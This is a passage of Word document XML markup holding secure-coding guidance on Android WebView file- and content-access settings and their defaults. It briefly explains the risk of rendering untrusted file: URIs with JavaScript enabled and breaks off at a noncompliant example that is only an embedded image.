        </w:rPr>
        <w:t>. Retrieved from wiki.sei.cmu.edu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E73837E" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setAllowFileAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30887E26" w14:textId="7D404B71" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>setAllowFileAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>) method enables or disables file access within WebView.</w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The default is </w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">state </w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCCA59F" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setAllowContentAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B74FF" w14:textId="0903D1F3" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>setAllowContentAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>) method enables or disables content URL access within WebView. Content URL access allows WebView to load content from a content provider installed in the system.</w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The default </w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">state </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>is true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189468C7" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setAllowFileAccessFromFileURLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108463CD" w14:textId="4444F5AC" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Sets whether JavaScript running in the context of a file scheme URL should be allowed to access content from other file scheme URLs. This setting should be disabled</w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to have the most secure restrictions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">he value of this setting is ignored if the </w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">value of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>getAllowUniversalAccessFromFileURLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>) is true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F56A37" w14:textId="34D13497" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The default value is true for API level ICE_CREAM_SANDWICH_MR1 (API level 15) and below, and false for API level JELLY_BEAN (API level 16) and above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8A967" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>setAllowUniversalAccessFromFileURLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487C410" w14:textId="1F02D0EE" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Sets whether JavaScript running in the context of a file scheme URL should be allowed to access content from any origin. This includes ac</w:t>
      </w:r>
      <w:r w:rsidR="00343A3C" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ess to content from other file scheme URLs. </w:t>
      </w:r>
      <w:r w:rsidR="00343A3C" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This setting should be disabled</w:t>
      </w:r>
      <w:r w:rsidR="00343A3C" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to have the most secure restriction</w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779662B" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The default value is true for API level ICE_CREAM_SANDWICH_MR1 (API level 15) and below, and false for API level JELLY_BEAN (API level 16) and above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751369E" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Security Concerns for </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WebView</w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A931AC" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When an activity has WebView embedded to display web pages, any application can create and send an Intent object with a given URI to the activity to request that a web page be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3915D" w14:textId="4A4A2DAF" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>WebView can recognize a variety of schemes, including the file: scheme. A malicious application may create and store a crafted content on its local storage area, make it accessible</w:t>
      </w:r>
      <w:r w:rsidR="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>with MODE_WORLD_READABLE permission, and send the URI (using the file: scheme) of this content to a target activity. The target activity renders this content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4C7C9E" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When the target activity (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>webView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t> object) sets JavaScript enabled, it can be abused to access the target application’s resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BED4D7" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="450" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Noncompliant Code Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF82FA6" w14:textId="4DB4BE4B" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00343A3C" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t>The code example in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses the WebView component with JavaScript enabled and processes any URI passed through Intent without any validation:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="21600" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="21600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F415AD" w:rsidRPr="00F415AD" w14:paraId="371E379E" w14:textId="77777777" w:rsidTr="00F415AD">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="225" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E1AB298" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRDefault="00F415AD" w:rsidP="00343A3C">
            <w:pPr>
              <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="494C4E"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00324837">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="122E4829" wp14:editId="14930039">
                  <wp:extent cx="5476875" cy="39338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6875" cy="3933825"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C49214C" w14:textId="2BB49DFB" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A3C">
            <w:pPr>
              <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
